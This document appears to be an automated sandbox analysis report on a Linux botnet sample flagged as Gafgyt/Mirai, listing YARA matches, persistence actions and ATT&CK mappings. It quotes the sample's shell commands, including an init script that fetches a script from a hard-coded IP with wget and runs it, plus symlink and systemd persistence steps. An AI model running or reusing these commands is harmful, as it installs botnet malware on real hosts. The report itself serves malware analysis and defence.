Source: 6316.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY; Matched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
Source: 6316.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY; Matched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
Source: 6316.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY; Matched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
Source: 6316.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY; Matched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
Source: 6316.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY; Matched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
Source: 6255.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY; Matched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
Source: 6255.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY; Matched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
          Source: 6255.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
          Source: 6255.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
          Source: 6255.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
          Source: 6255.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
          Source: 6255.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
          Source: 6326.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
          Source: 6326.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
          Source: 6326.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
          Source: 6326.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
          Source: 6326.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
          Source: 6326.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
          Source: 6326.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
          Source: 6318.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
          Source: 6318.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
          Source: 6318.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
          Source: 6318.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
          Source: 6318.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
          Source: 6318.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
          Source: 6318.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
          Source: 6327.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
          Source: 6327.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
          Source: 6327.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
          Source: 6327.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
          Source: 6327.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
          Source: 6327.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
          Source: 6327.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
          Source: classification engineClassification label: mal100.spre.troj.evad.linELF@0/9@0/0

          Persistence and Installation Behavior

Source: /tmp/x86_64.nn.elf (PID: 6255) | File: /etc/profile
Source: /tmp/x86_64.nn.elf (PID: 6255) | File: /etc/rc.local
Source: /usr/bin/ln (PID: 6308) | File: /etc/rcS.d/S99system -> /etc/init.d/system
Source: /usr/bin/ln (PID: 6315) | File: /etc/rc.d/S99sh -> /etc/init.d/sh
Source: /tmp/x86_64.nn.elf (PID: 6255) | File: /etc/rc.local (bits: - usr: rx grp: rx all: rwx)
Source: /usr/bin/chmod (PID: 6306) | File: /etc/init.d/system (bits: - usr: rx grp: rx all: rwx)
Source: /usr/bin/chmod (PID: 6311) | File: /etc/init.d/sh (bits: - usr: rx grp: rx all: rwx)
Source: /tmp/x86_64.nn.elf (PID: 6319) | File opened: /proc/6373/status
Source: /tmp/x86_64.nn.elf (PID: 6319) | File opened: /proc/6472/status
Source: /tmp/x86_64.nn.elf (PID: 6319) | File opened: /proc/6372/status
Source: /tmp/x86_64.nn.elf (PID: 6319) | File opened: /proc/6471/status
Source: /tmp/x86_64.nn.elf (PID: 6319) | File opened: /proc/6430/status
Source: /tmp/x86_64.nn.elf (PID: 6319) | File opened: /proc/6375/status
Source: /tmp/x86_64.nn.elf (PID: 6319) | File opened: /proc/6474/status
Source: /tmp/x86_64.nn.elf (PID: 6319) | File opened: /proc/6374/status
Source: /tmp/x86_64.nn.elf (PID: 6319) | File opened: /proc/6473/status
Source: /tmp/x86_64.nn.elf (PID: 6319) | File opened: /proc/6431/status
Source: /tmp/x86_64.nn.elf (PID: 6319) | File opened: /proc/6475/status
Source: /tmp/x86_64.nn.elf (PID: 6319) | File opened: /proc/6371/status
Source: /tmp/x86_64.nn.elf (PID: 6319) | File opened: /proc/6470/status
Source: /tmp/x86_64.nn.elf (PID: 6319) | File opened: /proc/6370/status
Source: /tmp/x86_64.nn.elf (PID: 6319) | File opened: /proc/799/cmdline
Source: /tmp/x86_64.nn.elf (PID: 6319) | File opened: /proc/6425/status
Source: /tmp/x86_64.nn.elf (PID: 6319) | File opened: /proc/6447/status
Source: /tmp/x86_64.nn.elf (PID: 6319) | File opened: /proc/6469/status
Source: /tmp/x86_64.nn.elf (PID: 6319) | File opened: /proc/6369/status
Source: /tmp/x86_64.nn.elf (PID: 6319) | File opened: /proc/6446/status
Source: /tmp/x86_64.nn.elf (PID: 6319) | File opened: /proc/6468/status
Source: /tmp/x86_64.nn.elf (PID: 6319) | File opened: /proc/6405/status
Source: /tmp/x86_64.nn.elf (PID: 6319) | File opened: /proc/6449/status
Source: /tmp/x86_64.nn.elf (PID: 6319) | File opened: /proc/6448/status
Source: /tmp/x86_64.nn.elf (PID: 6319) | File opened: /proc/6426/status
Source: /tmp/x86_64.nn.elf (PID: 6319) | File opened: /proc/6429/status
Source: /tmp/x86_64.nn.elf (PID: 6319) | File opened: /proc/6428/status
Source: /tmp/x86_64.nn.elf (PID: 6319) | File opened: /proc/6461/status
Source: /tmp/x86_64.nn.elf (PID: 6319) | File opened: /proc/6460/status
Source: /tmp/x86_64.nn.elf (PID: 6319) | File opened: /proc/6089/cmdline
Source: /tmp/x86_64.nn.elf (PID: 6319) | File opened: /proc/6463/status
Source: /tmp/x86_64.nn.elf (PID: 6319) | File opened: /proc/6462/status
Source: /tmp/x86_64.nn.elf (PID: 6319) | File opened: /proc/6465/status
Source: /tmp/x86_64.nn.elf (PID: 6319) | File opened: /proc/6464/status
Source: /tmp/x86_64.nn.elf (PID: 6319) | File opened: /proc/6445/status
Source: /tmp/x86_64.nn.elf (PID: 6319) | File opened: /proc/6467/status
Source: /tmp/x86_64.nn.elf (PID: 6319) | File opened: /proc/6466/status
Source: /tmp/x86_64.nn.elf (PID: 6319) | File opened: /proc/6459/status
Source: /tmp/x86_64.nn.elf (PID: 6272) | Shell command executed: sh -c "systemctl enable custom.service >/dev/null 2>&1"
Source: /tmp/x86_64.nn.elf (PID: 6304) | Shell command executed: sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"
Source: /tmp/x86_64.nn.elf (PID: 6307) | Shell command executed: sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"
Source: /tmp/x86_64.nn.elf (PID: 6309) | Shell command executed: sh -c "echo \"#!/bin/sh\n# /etc/init.d/sh\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting sh'\n /bin/sh &\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping sh'\n killall sh\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/sh"
Source: /tmp/x86_64.nn.elf (PID: 6310) | Shell command executed: sh -c "chmod +x /etc/init.d/sh >/dev/null 2>&1"
Source: /tmp/x86_64.nn.elf (PID: 6312) | Shell command executed: sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
Source: /tmp/x86_64.nn.elf (PID: 6314) | Shell command executed: sh -c "ln -s /etc/init.d/sh /etc/rc.d/S99sh >/dev/null 2>&1"
Source: /bin/sh (PID: 6306) | Chmod executable: /usr/bin/chmod -> chmod +x /etc/init.d/system
Source: /bin/sh (PID: 6311) | Chmod executable: /usr/bin/chmod -> chmod +x /etc/init.d/sh
Source: /bin/sh (PID: 6313) | Mkdir executable: /usr/bin/mkdir -> mkdir -p /etc/rc.d
Source: /bin/sh (PID: 6278) | Systemctl executable: /usr/bin/systemctl -> systemctl enable custom.service
Source: /tmp/x86_64.nn.elf (PID: 6255) | File: /etc/rc.local (bits: - usr: rx grp: rx all: rwx)
Source: /usr/bin/chmod (PID: 6306) | File: /etc/init.d/system (bits: - usr: rx grp: rx all: rwx)
Source: /usr/bin/chmod (PID: 6311) | File: /etc/init.d/sh (bits: - usr: rx grp: rx all: rwx)
Source: /tmp/x86_64.nn.elf (PID: 6255) | Writes shell script file to disk with an unusual file extension: /etc/init.d/system
Source: /tmp/x86_64.nn.elf (PID: 6255) | Writes shell script file to disk with an unusual file extension: /etc/rc.local
Source: /bin/sh (PID: 6309) | Writes shell script file to disk with an unusual file extension: /etc/init.d/sh

          Hooking and other Techniques for Hiding and Protection

Source: /tmp/x86_64.nn.elf (PID: 6255) | File: /etc/init.d/system
Source: /bin/sh (PID: 6309) | File: /etc/init.d/sh
Source: /tmp/x86_64.nn.elf (PID: 6255) | File: /tmp/x86_64.nn.elf
Source: x86_64.nn.elf, 6327.1.0000000000efd000.0000000000eff000.rw-.sdmp | Binary or memory string: /usr/bin/vmtoolsd
Source: x86_64.nn.elf, 6327.1.0000000000efd000.0000000000eff000.rw-.sdmp | Binary or memory string: /usr/bin/vmtoolsd
Source: x86_64.nn.elf, 6255.1.00007fff0efc5000.00007fff0efe6000.rw-.sdmp, x86_64.nn.elf, 6316.1.00007fff0efc5000.00007fff0efe6000.rw-.sdmp, x86_64.nn.elf, 6318.1.00007fff0efc5000.00007fff0efe6000.rw-.sdmp, x86_64.nn.elf, 6326.1.00007fff0efc5000.00007fff0efe6000.rw-.sdmp, x86_64.nn.elf, 6327.1.00007fff0efc5000.00007fff0efe6000.rw-.sdmp | Binary or memory string: qemu-

          Stealing of Sensitive Information

Source: Yara match | File source: x86_64.nn.elf, type: SAMPLE
Source: Yara match | File source: 6316.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY
Source: Yara match | File source: 6255.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY
Source: Yara match | File source: 6326.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY
Source: Yara match | File source: 6318.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY
Source: Yara match | File source: 6327.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY
Source: Yara match | File source: x86_64.nn.elf, type: SAMPLE
Source: Yara match | File source: 6316.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY
Source: Yara match | File source: 6255.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY
Source: Yara match | File source: 6326.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY
Source: Yara match | File source: 6318.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY
Source: Yara match | File source: 6327.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: x86_64.nn.elf PID: 6255, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: x86_64.nn.elf PID: 6316, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: x86_64.nn.elf PID: 6318, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: x86_64.nn.elf PID: 6326, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: x86_64.nn.elf PID: 6327, type: MEMORYSTR

          Remote Access Functionality

Source: Yara match | File source: x86_64.nn.elf, type: SAMPLE
Source: Yara match | File source: 6316.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY
Source: Yara match | File source: 6255.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY
Source: Yara match | File source: 6326.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY
Source: Yara match | File source: 6318.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY
Source: Yara match | File source: 6327.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY
Source: Yara match | File source: x86_64.nn.elf, type: SAMPLE
Source: Yara match | File source: 6316.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY
Source: Yara match | File source: 6255.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY
Source: Yara match | File source: 6326.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY
Source: Yara match | File source: 6318.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY
Source: Yara match | File source: 6327.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: x86_64.nn.elf PID: 6255, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: x86_64.nn.elf PID: 6316, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: x86_64.nn.elf PID: 6318, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: x86_64.nn.elf PID: 6326, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: x86_64.nn.elf PID: 6327, type: MEMORYSTR
MITRE ATT&CK Matrix

One line per tactic, listing the three technique cells of the matrix in row order. A leading count marks a technique that matched signatures in this analysis; cells without a count are the matrix's default entries for that tactic.

Reconnaissance: Gather Victim Identity Information | Credentials | Email Addresses
Resource Development: 2 Scripting | Domains | DNS Server
Initial Access: Valid Accounts | Default Accounts | Domain Accounts
Execution: Windows Management Instrumentation | Scheduled Task/Job | At
Persistence: 1 Unix Shell Configuration Modification | 1 Systemd Service | 2 Scripting
Privilege Escalation: 1 Unix Shell Configuration Modification | 1 Systemd Service | Logon Script (Windows)
Defense Evasion: 1 Masquerading | 2 File and Directory Permissions Modification | 1 File Deletion
Credential Access: 1 OS Credential Dumping | LSASS Memory | Security Account Manager
Discovery: 1 Security Software Discovery | Application Window Discovery | Query Registry
Lateral Movement: Remote Services | Remote Desktop Protocol | SMB/Windows Admin Shares
Collection: Data from Local System | Data from Removable Media | Data from Network Shared Drive
Command and Control: 1 Encrypted Channel | 1 Non-Standard Port | 1 Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium | Exfiltration Over Bluetooth | Automated Exfiltration
Impact: 1 Data Manipulation | Network Denial of Service | Data Encrypted for Impact
          No configs have been found
Behavior Graph (ID: 1574207, Sample: x86_64.nn.elf, Start date: 13/12/2024, Architecture: LINUX, Score: 100)
Network: 35.38.189.105, 23, 37312 (UMICH-AS-5US, United States); 191.141.13.246, 23, 43330 (TIMSABR, Brazil); 28 other IPs or domains
Top-level signatures: Malicious sample detected (through community Yara rule); Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for submitted file; 3 other signatures
Processes started: x86_64.nn.elf; udisksd dumpe2fs (twice); 8 other processes
x86_64.nn.elf: dropped /etc/rc.local (POSIX), /etc/profile (ASCII), /etc/init.d/system (POSIX); signatures: Sample tries to set files in /etc globally writable, Sample tries to persist itself using /etc/profile, Drops files in suspicious directories, 2 other signatures; started x86_64.nn.elf sh (three times) and 5 other processes
sh children: sh chmod, sh ln, sh chmod, sh ln, sh systemctl, sh mkdir, 4 other processes; dropped /etc/init.d/sh (POSIX); signatures: Drops files in suspicious directories; Sample tries to set files in /etc globally writable (sh chmod); Sample tries to persist itself using System V runlevels (sh ln)

Antivirus, Machine Learning and Genetic Malware Detection

Source | Detection | Scanner | Label
